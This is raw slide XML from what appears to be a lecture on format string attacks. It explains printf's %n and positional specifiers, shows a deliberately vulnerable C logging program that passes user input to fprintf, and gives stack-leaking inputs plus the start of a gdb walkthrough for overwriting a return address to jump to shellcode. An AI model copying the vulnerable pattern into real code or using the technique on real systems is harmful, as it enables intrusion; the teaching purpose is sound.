              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If parameters are missing, values from the stack are used instead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a 64-bit architecture, first the values in the registers will be used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178491200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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’s Less-Known Facts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to reference the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> element on the argument list using the notation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i$p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: This does not cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to move the argument pointer up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>the stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to specify the amount of characters being printed using the notation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>kp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is found, the number of output characters processed is stored at the address passed as the next argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Hello%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>”, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> puts the value 5 in the variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26007603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Vulnerable Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">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const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	FILE* f;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	f = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>("/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/log", "a+");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>add_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(f);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(f);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1208788"/>
            <a:ext cx="4038600" cy="3711787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>add_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(FILE* f) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	char line[65536];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = 0, res;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	while (1) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		res = read(0, &amp;line[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>], 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		if (res == 0) exit(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> == 65536) exit(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		if (line[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> - 1] == '\n') {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>			line[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>			break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(f, line);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276368189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Executions (32-bit)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>echo "test line"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test line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>echo "test line %x %x"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test line 1 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>echo `python -c 'print "AAAABBBBCCCCDDDD" + "%p" * 8'`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AAAABBBBCCCCDDDD0x1(nil)(nil)(nil)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>0x414141410x424242420x434343430x44444444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188640954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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is put in the environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) find *environ, +800, 'E', 'G', 'G', '='</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>0xffffd374</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>1 pattern found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The return address of the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>add_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is overwritten using consecutive writes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) x/2x $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>0xffffceb8:	0xffffcee8	0x080485bb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>0x080485bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>must </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>become</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>0xffffd374 + 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Therefore, we need to write the bytes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>0x78 0xd3 0xff 0xff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>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0352241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4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
